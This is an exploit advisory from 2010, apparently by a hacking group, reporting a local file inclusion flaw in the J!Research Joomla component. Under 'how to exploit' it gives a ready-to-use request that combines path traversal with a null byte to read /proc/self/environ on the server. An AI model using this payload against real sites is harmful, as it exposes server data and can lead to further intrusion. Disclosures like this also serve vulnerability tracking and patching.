--------------------------------------------------------------------------------- Joomla Component J!Research Local File Inclusion --------------------------------------------------------------------------------- Author : Chip D3 Bi0s Group : LatinHackTeam Email & msn : chipdebios[alt+64]gmail.com Date : 22 March 2010 Critical Lvl : Moderate Impact : Exposure of sensitive information Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : J!Research Developer : Luis Galrraga License : GPL type : Commercial more info : http://joomla-research.com/ Description : J!Research is a component for Joomla!�1.5 which allows for management of research-related work such as; publications, projects, and theses categorized by research area. The extension is oriented to University researchers and research departments which utilize or plan to adopt Joomla! as their content management system for publishing research. It includes several plugins which are installed automatically with the component: - Automatic citation plugin for TinyMCE editor - Generic automatic citation plugin (editors-xtd) for any editor. - Several plugins for persistence of cited records when writing documents. - Extended search to include J!Research items in searches It also includes support for several citation styles: APA, MLA, IEEE, Chicago and CSE. --------------------------------------------------------------------------- Vulnerable file: jresearch.php -------------------- how to exploit http://localhost/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00 +++++++++++++++++++++++++++++++++++++++ [!] Produced in South America +++++++++++++++++++++++++++++++++++++++